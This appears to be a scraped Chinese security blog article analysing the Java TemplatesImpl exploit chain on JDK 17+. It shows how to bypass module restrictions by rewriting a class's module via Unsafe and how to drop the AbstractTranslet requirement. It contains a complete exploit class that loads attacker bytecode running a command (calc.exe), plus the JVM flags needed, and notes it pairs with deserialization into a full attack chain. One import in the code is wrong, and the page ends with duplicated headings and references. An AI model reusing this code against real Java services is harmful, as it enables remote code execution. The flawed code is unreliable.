JDK高版本下TemplatesImpl利用链绕过反射限制技术分析<\/h1>

1. TemplatesImpl利用链基础回顾<\/h2>

1.1 基本利用链<\/h3>
TemplatesImpl利用链调用流程如下：<\/p>
TemplatesImpl#getOutputProperties() 
-> TemplatesImpl#newTransformer() 
-> TemplatesImpl#getTransletInstance() 
-> TemplatesImpl#defineTransletClasses() 
-> TransletClassLoader#defineClass()
<\/code><\/pre>
1.2 关键点分析<\/h3>


defineClass方法访问控制<\/strong>：<\/p>

TemplatesImpl类重写了defineClass方法，且没有显式声明作用域（默认为default）<\/li>
这使得外部可以调用该方法，而ClassLoader#defineClass是protected的<\/li>
<\/ul>
<\/li>

必要参数设置<\/strong>：<\/p>

_bytecodes<\/code>：要加载的恶意字节码<\/li>
_name<\/code>：不能为空<\/li>
_tfactory<\/code>：需要设置为TransformerFactoryImpl实例<\/li>
<\/ul>
<\/li>

传统限制条件<\/strong>：<\/p>

恶意类必须继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/li>
否则在defineTransletClasses()<\/code>方法中会抛出异常<\/li>
<\/ul>
<\/li>
<\/ol>
2. JDK高版本的限制问题<\/h2>
2.1 JDK9+模块系统(JPMS)的影响<\/h3>


内部API封装<\/strong>：<\/p>

com.sun.*等内部类被模块系统强封装<\/li>
默认不可访问<\/li>
<\/ul>
<\/li>

反射限制<\/strong>：<\/p>

JDK17+即使使用setAccessible(true)<\/code>也会被InaccessibleObjectException<\/code>拦截<\/li>
需要添加JVM参数--add-opens<\/code>或使用Java Agent<\/li>
<\/ul>
<\/li>
<\/ol>
2.2 具体表现<\/h3>

直接使用TemplatesImpl会抛出异常<\/li>
setAccessible方法受到严格限制<\/li>
<\/ul>
3. 绕过技术分析<\/h2>
3.1 使用Unsafe类绕过模块限制<\/h3>
3.1.1 Unsafe类基础<\/h4>

位于sun.misc包<\/li>
提供低级别、不安全操作（直接内存访问等）<\/li>
获取方式：<\/li>
<\/ul>
private<\/span> static<\/span> Unsafe getUnsafe<\/span>()<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Field field =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        return<\/span> (<\/span>Unsafe)<\/span> field.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> AssertionError(<\/span>e);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.1.2 绕过原理<\/h4>


模块检查机制<\/strong>：<\/p>

checkCanSetAccessible<\/code>方法检查调用者模块与声明成员类的模块<\/li>
如果相同或调用者是未知模块(Object.class.getModule)，则允许访问<\/li>
<\/ul>
<\/li>

利用Unsafe修改模块<\/strong>：<\/p>

使用Unsafe修改当前类的module为Object.class.getModule()<\/li>
绕过模块检查<\/li>
<\/ul>
<\/li>
<\/ol>
public<\/span> static<\/span> void<\/span> test2_bypassJDK<\/span>()<\/span> throws<\/span> ClassNotFoundException,<\/span> NoSuchFieldException,<\/span> IllegalAccessException {<\/span>
<\/span><\/span>    Class<?><\/span> unSafe =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.misc.Unsafe"<\/span>);<\/span>
<\/span><\/span>    Field unSafeField =<\/span> unSafe.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>    unSafeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Unsafe unSafeClass =<\/span> (<\/span>Unsafe)<\/span> unSafeField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    Module baseModule =<\/span> Object.<\/span>class<\/span>.<\/span>getModule<\/span>();<\/span>
<\/span><\/span>    Class<?><\/span> currentClass =<\/span> TemplatesImplDemo.<\/span>class<\/span>;<\/span>
<\/span><\/span>    long<\/span> addr =<\/span> unSafeClass.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"module"<\/span>));<\/span>
<\/span><\/span>    unSafeClass.<\/span>getAndSetObject<\/span>(<\/span>currentClass,<\/span> addr,<\/span> baseModule);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 绕过AbstractTranslet继承限制<\/h3>
3.2.1 传统限制分析<\/h4>

_transletIndex<\/code>必须指向继承AbstractTranslet的类<\/li>
否则抛出异常<\/li>
<\/ul>
3.2.2 绕过方法<\/h4>


直接设置_transletIndex<\/strong>：<\/p>

_transletIndex<\/code>不是transient，可以通过反射设置<\/li>
设置为0指向第一个类<\/li>
<\/ul>
<\/li>

处理_auxClasses<\/strong>：<\/p>

当类不继承AbstractTranslet时，会向_auxClasses<\/code>添加数据<\/li>
需要保证_auxClasses<\/code>不为空<\/li>
通过传入多个类（_bytecodes<\/code>数组长度>1）自动初始化_auxClasses<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
public<\/span> static<\/span> void<\/span> test1<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> payload =<\/span> getTemplateCode();<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> nu11 =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>makeClass<\/span>(<\/span>"nu11"<\/span>).<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>    setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>payload,<\/span> nu11});<\/span>
<\/span><\/span>    setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "nu11"<\/span>);<\/span>
<\/span><\/span>    setFieldValue(<\/span>templates,<\/span> "_transletIndex"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>    setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>    templates.<\/span>newTransformer<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 完整利用代码示例<\/h2>
package<\/span> com.test;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> javassist.ClassPool;<\/span>
<\/span><\/span>import<\/span> javassist.CtClass;<\/span>
<\/span><\/span>import<\/span> sun.misc.Unsafe;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.module.Module;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> TemplatesImplDemo<\/span> {<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置字段值
<\/span><\/span><\/span><\/span>    public<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String fieldName,<\/span> Object value)<\/span> 
<\/span><\/span>            throws<\/span> NoSuchFieldException,<\/span> IllegalAccessException {<\/span>
<\/span><\/span>        Field declaredField =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        declaredField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        declaredField.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 生成恶意字节码
<\/span><\/span><\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> getTemplateCode<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>        CtClass template =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"nu11nu11nu11nu11nu11"<\/span>);<\/span>
<\/span><\/span>        String block =<\/span> "Runtime.getRuntime().exec(\"calc.exe\");"<\/span>;<\/span>
<\/span><\/span>        template.<\/span>makeClassInitializer<\/span>().<\/span>insertBefore<\/span>(<\/span>block);<\/span>
<\/span><\/span>        return<\/span> template.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 绕过模块限制
<\/span><\/span><\/span><\/span>    public<\/span> static<\/span> void<\/span> bypassJDKModule<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class<?><\/span> unSafe =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.misc.Unsafe"<\/span>);<\/span>
<\/span><\/span>        Field unSafeField =<\/span> unSafe.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>        unSafeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Unsafe unSafeClass =<\/span> (<\/span>Unsafe)<\/span> unSafeField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>        Module baseModule =<\/span> Object.<\/span>class<\/span>.<\/span>getModule<\/span>();<\/span>
<\/span><\/span>        Class<?><\/span> currentClass =<\/span> TemplatesImplDemo.<\/span>class<\/span>;<\/span>
<\/span><\/span>        long<\/span> addr =<\/span> unSafeClass.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"module"<\/span>));<\/span>
<\/span><\/span>        unSafeClass.<\/span>getAndSetObject<\/span>(<\/span>currentClass,<\/span> addr,<\/span> baseModule);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ TemplatesImpl利用
<\/span><\/span><\/span><\/span>    public<\/span> static<\/span> void<\/span> exploit<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> payload =<\/span> getTemplateCode();<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> dummyClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>makeClass<\/span>(<\/span>"dummy"<\/span>).<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>payload,<\/span> dummyClass});<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "nu11"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_transletIndex"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        templates.<\/span>newTransformer<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Java Version: "<\/span> +<\/span> System.<\/span>getProperty<\/span>(<\/span>"java.version"<\/span>));<\/span>
<\/span><\/span>        bypassJDKModule();<\/span>
<\/span><\/span>        exploit();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 注意事项与解决方案<\/h2>
5.1 常见问题<\/h3>


sun.misc包不存在<\/strong>：<\/p>

需要确保JVM参数包含--add-opens=jdk.unsupported\/sun.misc=ALL-UNNAMED<\/code><\/li>
<\/ul>
<\/li>

模块访问错误<\/strong>：<\/p>

需要添加必要的--add-opens<\/code>参数<\/li>
<\/ul>
<\/li>
<\/ol>
5.2 推荐的JVM参数<\/h3>
--add-opens=java.base\/java.io=ALL-UNNAMED 
--add-opens=jdk.unsupported\/sun.misc=ALL-UNNAMED 
--add-opens java.xml\/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED
<\/code><\/pre>
6. 技术总结<\/h2>


Unsafe绕过模块限制<\/strong>：<\/p>

修改调用类模块为Object.class.getModule()<\/li>
绕过checkCanSetAccessible检查<\/li>
<\/ul>
<\/li>

非AbstractTranslet子类利用<\/strong>：<\/p>

直接设置_transletIndex<\/code><\/li>
提供多个类确保_auxClasses<\/code>初始化<\/li>
<\/ul>
<\/li>

高版本JDK适应性<\/strong>：<\/p>

该方法适用于JDK17+环境<\/li>
结合反序列化可构成完整攻击链<\/li>
<\/ul>
<\/li>
<\/ol>
7. 参考资源<\/h2>

Unsafe绕过高版本JDK反射限制<\/li>
高版本JDK下的Spring原生反序列化链<\/li>
去除AbstractTranslet限制技术<\/li>
BeichenDream的Kcon2021Code示例<\/li>
Oracle官方JDK迁移指南<\/li>
<\/ol>
JDK高版本下TemplatesImpl利用链绕过反射限制技术分析<\/h1>

1. TemplatesImpl利用链基础回顾<\/h2>

2. JDK高版本的限制问题<\/h2>

3. 绕过技术分析<\/h2>

3.1 使用Unsafe类绕过模块限制<\/h3>

3.2 绕过AbstractTranslet继承限制<\/h3>

5. 注意事项与解决方案<\/h2>

7. 参考资源<\/h2> Unsafe绕过高版本JDK反射限制<\/li> 高版本JDK下的Spring原生反序列化链<\/li> 去除AbstractTranslet限制技术<\/li> BeichenDream的Kcon2021Code示例<\/li> Oracle官方JDK迁移指南<\/li> <\/ol>

7. 参考资源<\/h2>

Unsafe绕过高版本JDK反射限制<\/li>
高版本JDK下的Spring原生反序列化链<\/li>
去除AbstractTranslet限制技术<\/li>
BeichenDream的Kcon2021Code示例<\/li>
Oracle官方JDK迁移指南<\/li> <\/ol>
